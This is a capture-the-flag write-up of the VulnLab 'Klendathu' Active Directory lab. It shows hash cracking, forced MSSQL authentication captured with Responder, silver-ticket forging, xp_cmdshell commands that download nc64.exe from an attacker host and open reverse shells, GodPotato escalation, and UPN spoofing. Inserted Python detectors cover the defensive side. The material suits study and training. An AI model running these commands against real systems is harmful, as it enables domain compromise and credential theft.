vulnlab-klendathu
Klendathu, an insane-rated AD chain.
Solved with: an NFS share containing a config file with the password hash of zim@klendathu.vl; guest access on the MSSQL service, forcing authentication with sys.dm_os_file_exists; forging a silver ticket, then escalating privileges on SRV1; spoofing a domain user on SRV2 with the MSSQL user; then using ntdissector, a swiss army knife for your NTDS.dit files, and decrypting RDCMan credentials with the domain backup key using rdgdec.py.
NFS Enum
$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *
$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares
(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg
Switch344#show running-config
Building configuration...

Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO
snmp-server contact ZIM@KLENDATHU.VL
!
end
Switch344#
$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds
$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22
$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB   10.10.220.149  445  DC1  [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB   10.10.220.149  445  DC1  [+] KLENDATHU.VL\zim:football22
SMB   10.10.220.149  445  DC1  [*] Enumerated shares
SMB   10.10.220.149  445  DC1  Share     Permissions  Remark
SMB   10.10.220.149  445  DC1  -----     -----------  ------
SMB   10.10.220.149  445  DC1  ADMIN$                 Remote Admin
SMB   10.10.220.149  445  DC1  C$                     Default share
SMB   10.10.220.149  445  DC1  HomeDirs  READ
SMB   10.10.220.149  445  DC1  IPC$      READ         Remote IPC
SMB   10.10.220.149  445  DC1  NETLOGON  READ         Logon server share
SMB   10.10.220.149  445  DC1  SYSVOL    READ         Logon server share
$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB   10.10.220.150  445  SRV1  [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB   10.10.220.150  445  SRV1  [+] KLENDATHU.VL\zim:football22
SMB   10.10.220.150  445  SRV1  [*] Enumerated shares
SMB   10.10.220.150  445  SRV1  Share   Permissions  Remark
SMB   10.10.220.150  445  SRV1  -----   -----------  ------
SMB   10.10.220.150  445  SRV1  ADMIN$               Remote Admin
SMB   10.10.220.150  445  SRV1  C$                   Default share
SMB   10.10.220.150  445  SRV1  IPC$    READ         Remote IPC
$ impacket-smbclient zim@dc1.klendathu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Bloodhound Enum
$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip
MSSQL access
We have MSSQL running on SRV1, so we check whether we can log in there.
$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL  10.10.220.150  1433  SRV1  [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL  10.10.220.150  1433  SRV1  [+] KLENDATHU.VL\zim:foo<redacted>22

$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
-----
guest
SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists
-----------   -------------------   -----------------------
          0                     1                         1
SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists
-----------   -------------------   -----------------------
          0                     0                         0
SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists
-----------   -------------------   -----------------------
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)>
We are only guest, but we can still call SELECT * FROM sys.dm_os_file_exists with a UNC path: the SQL Server service account then authenticates to our host, and Responder captures the NTLMv2 hash of the account used to start the MSSQL service.
$ responder -I tun0
[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00

$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99
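From the blue-team side, the coercion above leaves a clear trace: a low-privilege (guest-mapped) login calling a file-probing procedure with a UNC path. The following detector is an added example, not part of the writeup or of any tool it uses; it runs over constructed audit records in a simple pipe-separated format (a stand-in for a real SQL Server audit export) and flags the statements that would make the service account authenticate outbound.

```python
import re

# Procedures and functions that make the SQL Server service account touch a
# path. Pointed at a UNC path they make that account authenticate outbound,
# which is the forced-authentication primitive used against SRV1 above.
FILE_PROBES = ("xp_fileexist", "sys.dm_os_file_exists", "xp_dirtree", "xp_subdirs")

# \\host\share... (backslash form) or //host/share... (forward-slash form)
UNC_RE = re.compile(r"\\\\[^\s'\"\\]+\\[^\s'\"]*|//[^\s'\"/]+/[^\s'\"]*")


def find_forced_auth(statement):
    """Return (probe, unc_path) when a T-SQL statement calls a file probe
    with a UNC path argument, otherwise None."""
    lowered = statement.lower()
    for probe in FILE_PROBES:
        if probe in lowered:
            match = UNC_RE.search(statement)
            if match:
                return probe, match.group(0)
    return None


def scan_audit(lines):
    """lines: records of the form 'timestamp|login|db_user|statement'
    (a constructed format standing in for a SQL Server audit export).
    Returns one finding per statement that would force outbound auth."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4:
            continue  # malformed record: skip it rather than abort the scan
        ts, login, db_user, stmt = parts
        hit = find_forced_auth(stmt)
        if hit is None:
            continue
        probe, path = hit
        findings.append({
            "time": ts,
            "login": login,
            "probe": probe,
            "unc": path,
            # a guest-mapped login doing this is exactly the session shown above
            "guest_caller": db_user.lower() == "guest",
        })
    return findings


# Constructed sample records; the UNC host is the attacker box from the writeup.
SAMPLE_AUDIT = [
    "2024-08-29T10:31:02|KLENDATHU\\ZIM|guest|xp_fileexist 'C:\\'",
    "2024-08-29T10:31:20|KLENDATHU\\ZIM|guest|"
    "SELECT * FROM sys.dm_os_file_exists('\\\\10.8.2.138\\puck\\')",
    "2024-08-29T10:32:01|KLENDATHU\\ZIM|guest|xp_fileexist '\\\\10.8.2.138\\puck:\\'",
    "2024-08-29T10:40:00|KLENDATHU\\svc_app|dbo|EXEC xp_dirtree 'D:\\exports', 1, 1",
    "2024-08-29T10:41:00|KLENDATHU\\svc_app|dbo|SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    for f in scan_audit(SAMPLE_AUDIT):
        print(f"{f['time']} {f['login']} {f['probe']} -> {f['unc']} guest={f['guest_caller']}")
```

Local paths (the 'C:\' and 'D:\exports' records) are deliberately not flagged; the risk is the UNC target, and the usual fixes are dropping the guest mapping, running the instance under a gMSA and blocking outbound SMB from database hosts.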
Forging Silver Ticket
The MSSQL service runs as the RASCZAK user, so we create a silver ticket for his service.
ldapdump
$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
To get the domain SID:
$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK	Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131
Convert the plaintext password into an NT hash:
$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4
MD4(stdin)= e2<redacted>2c
Create the silver ticket:
$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache
Once on the MSSQL shell, first run:
# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Verify we have SeImpersonatePrivilege
> xp_cmdshell "whoami /priv"

$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)>
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output
--------------------------------------------------------------------------------
PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe
PS C:\Windows\system32>
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"
Getting the reverse shell:
$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131
GodPotato for privesc:
PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092
Getting the elevated reverse shell:
$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1

PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.

C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}
Spoofing Domain Users On GSSAPI Authentication
Checking BloodHound outbound control for RASCZAK, we have GenericWrite and ForceChangePassword on two domain users, rico and ibanez. With this ACL we can change the password using rpcclient or net rpc:
$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"
Verifying creds:
$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB   10.10.220.149  445  DC1  [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB   10.10.220.149  445  DC1  [+] KLENDATHU.VL\ibanez:Summer2024!
There is research by Ceri Coburn from Pen Test Partners showing that Linux servers joined to AD can carry a misconfiguration in their authentication mechanism when the enterprise name type (NT_ENTERPRISE) is used: if we have GenericWrite on a domain user, we can edit its userPrincipalName attribute, and because that attribute is what NT_ENTERPRISE lookups resolve, we can spoof other domain users.
To abuse this we first need to identify the user we will spoof. There is a group named LINUX_ADMINS with two members, flores and leivy. We then set userPrincipalName to one of those two users; to add this attribute we can use ldapmodify, for which we need to create an LDIF file.
$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"

$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy
Verify that the LDAP attribute was added correctly:
$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -i userPrincipalName
userPrincipalName: leivy
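The attribute change above is what a directory audit should catch: an account whose userPrincipalName resolves to somebody else's sAMAccountName. The helper below is an added example, not from the writeup or from Ceri Coburn's research, and it runs over a constructed directory snapshot in the shape of an ldapsearch/ldapdomaindump export (the rico entry is an extra constructed case showing the suffixed form of the same collision).

```python
# Audit helper for the UPN trick above: with the NT_ENTERPRISE name type the
# KDC resolves the requested name through userPrincipalName, so any account
# whose UPN prefix equals another account's sAMAccountName can obtain tickets
# that a GSSAPI/SSSD host maps to that other account.

DEFAULT_REALM = "KLENDATHU.VL"  # the lab realm from the writeup


def upn_prefix(upn, realm=DEFAULT_REALM):
    """Split a UPN into (name, realm). A bare UPN such as 'leivy' carries no
    suffix and is resolved in the default realm, which is what was set above."""
    if "@" in upn:
        name, _, suffix = upn.rpartition("@")
        return name.lower(), suffix.upper()
    return upn.lower(), realm.upper()


def find_upn_collisions(users, realm=DEFAULT_REALM):
    """users: dicts with 'sAMAccountName' and optional 'userPrincipalName',
    the shape of an ldapsearch or ldapdomaindump export. Returns a finding for
    every account whose UPN would resolve to a different account."""
    by_sam = {u["sAMAccountName"].lower(): u for u in users}
    findings = []
    for user in users:
        upn = user.get("userPrincipalName")
        if not upn:
            continue
        name, suffix = upn_prefix(upn, realm)
        if suffix != realm.upper():
            continue  # only the domain's own realm is checked here
        target = by_sam.get(name)
        if target is not None and target is not user:
            findings.append({
                "account": user["sAMAccountName"],
                "upn": upn,
                "resolves_to": target["sAMAccountName"],
                "bare_upn": "@" not in upn,
            })
    return findings


# Constructed directory snapshot modelled on the lab's users; only ibanez's
# UPN was changed in the writeup, rico's is an extra constructed case.
SAMPLE_USERS = [
    {"sAMAccountName": "leivy", "userPrincipalName": "leivy@KLENDATHU.VL"},
    {"sAMAccountName": "flores", "userPrincipalName": "flores@KLENDATHU.VL"},
    {"sAMAccountName": "rasczak", "userPrincipalName": "rasczak@klendathu.vl"},
    {"sAMAccountName": "ibanez", "userPrincipalName": "leivy"},
    {"sAMAccountName": "rico", "userPrincipalName": "flores@KLENDATHU.VL"},
    {"sAMAccountName": "zim"},
]

if __name__ == "__main__":
    for f in find_upn_collisions(SAMPLE_USERS):
        print(f"{f['account']}: userPrincipalName={f['upn']!r} resolves to {f['resolves_to']}")
```

Running this periodically, or alerting on directory writes to userPrincipalName by anything other than provisioning, closes the window the GenericWrite holder used here.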
I tried Rubeus, but this did not work for me.
c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

  v2.3.2

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Next I found how to add a -principal option to getTGT.py.

(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py .

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
	renew until 08/30/2024 16:21:33
We need to modify our /etc/krb5.conf:

[libdefaults]
    default_realm = KLENDATHU.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true
# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false

[realms]
    KLENDATHU.VL = {
        kdc = dc1.klendathu.vl
        admin_server = dc1.klendathu.vl
    }

[domain_realm]
    .klendathu.vl = KLENDATHU.VL
    klendathu.vl = KLENDATHU.VL
Now we can SSH to srv2 using Kerberos authentication. After becoming root we go into /root/inc5543_domaincontroller_backup/ and transfer this backup to our Kali box.

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendathu.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}
[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt
Incident: INC5543

I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]#

Also transfer the /tmp/krb5cc_990001135 file to Kali.
Decrypting RDCMan password
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
	renew until 09/05/2024 16:37:51

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip
Decrypt a .rdg password using ntdissector and dpapilab
We transfer the contents of HomeDirs/JENKINS to our Kali box, unzip AppData_Roaming_Backup.zip, and cat jenkins.rdg:
<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>
So we have an encrypted password.
After extracting the .zip we also have the master keys under ./Roaming/Microsoft/Protect.
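Finding files like jenkins.rdg before an attacker does is the cheaper defence. The helper below is an added example, not from the writeup, RDCMan or dpapilab: it parses an .rdg file, reports every stored credential profile, checks whether the password field is a DPAPI blob (version 1 followed by the DPAPI provider GUID) and lists which servers reference a profile. Nothing is decrypted; the .rdg and the blob it runs on are constructed stand-ins for the file shown above.

```python
import base64
import xml.etree.ElementTree as ET

# Provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB} as it appears on the
# wire, right after the 4-byte version field of every DPAPI blob.
DPAPI_PROVIDER_GUID = bytes.fromhex("d08c9ddf0115d1118c7a00c04fc297eb")


def is_dpapi_blob(b64text):
    """True when the base64 text decodes to something carrying the DPAPI
    header, i.e. a CryptProtectData blob that only the owning user's master
    key (or the domain backup key, as in the writeup) can open."""
    try:
        raw = base64.b64decode(b64text, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return len(raw) >= 20 and raw[:4] == b"\x01\x00\x00\x00" and raw[4:20] == DPAPI_PROVIDER_GUID


def inventory_rdg(xml_text):
    """Walk an RDCMan .rdg document and report every stored credential
    profile plus the (server, profile) pairs that use one."""
    root = ET.fromstring(xml_text)
    profiles = []
    for prof in root.iter("credentialsProfile"):
        password = prof.findtext("password") or ""
        profiles.append({
            "profile": prof.findtext("profileName"),
            "user": prof.findtext("userName"),
            "domain": prof.findtext("domain"),
            "dpapi_protected": is_dpapi_blob(password),
        })
    servers = [
        (srv.findtext("properties/name"), srv.findtext("logonCredentials/profileName"))
        for srv in root.iter("server")
    ]
    return profiles, servers


# Constructed stand-in for the AQ[...] blob: a valid DPAPI header followed by
# zero bytes, not a real ciphertext.
SAMPLE_BLOB = base64.b64encode(b"\x01\x00\x00\x00" + DPAPI_PROVIDER_GUID + b"\x00" * 16).decode()

# Constructed .rdg mirroring the structure of jenkins.rdg above.
SAMPLE_RDG = f"""<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\\administrator</profileName>
        <userName>administrator</userName>
        <password>{SAMPLE_BLOB}</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <server>
      <properties><name>dc1.klendathu.vl</name></properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
</RDCMan>"""

if __name__ == "__main__":
    profiles, servers = inventory_rdg(SAMPLE_RDG)
    for p in profiles:
        print(f"profile {p['profile']}: {p['domain']}\\{p['user']} dpapi={p['dpapi_protected']}")
    for name, prof in servers:
        print(f"server {name} uses profile {prof}")
```

A user-scope DPAPI blob is only as safe as that user's master keys, so a backup that bundles Roaming/Microsoft/Protect together with the .rdg, as the JENKINS share did, should be treated as holding the cleartext.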
Next I used an Ubuntu box to do the decrypting.
puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR] [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent] [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help            show this help message and exit
  -V, --version         Display version info

Examples:
  > Dump users, groups and domain backup keys
    $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret
  > Dump all records from the database
    $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all
  > Dump user objects and include deleted records
    $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel
  > List object classes available to filter records
    $ ntdissector -ntds NTDS.dit -filters

